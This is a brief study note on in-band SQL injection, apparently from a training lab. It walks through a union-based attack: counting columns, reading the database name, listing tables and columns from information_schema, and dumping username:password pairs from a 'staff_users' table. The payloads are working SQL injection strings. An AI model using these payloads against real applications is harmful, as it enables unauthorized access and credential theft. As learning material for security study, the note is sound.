➡️In-Band SQLi

2 types:

• Error-Based SQLi

• Union-Based SQLi

Example for an Union-Based SQLi:

1. Try to find how many columns the original SELECT query return

   1 UNION SELECT 1→ error

   1 UNION SELECT 1,2→ error

   1 UNION SELECT 1,2,3→ success!

   So, in this case, we have 3 columns

2. If the result is only one the first one, do this: 0 UNION SELECT 1,2,3

3. Get the database name

   0 UNION SELECT 1,2,database()

4. And so on with tables and columns that are in the founded database

0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'

0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

1. Finally, concat every columns you want the result to dump values

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users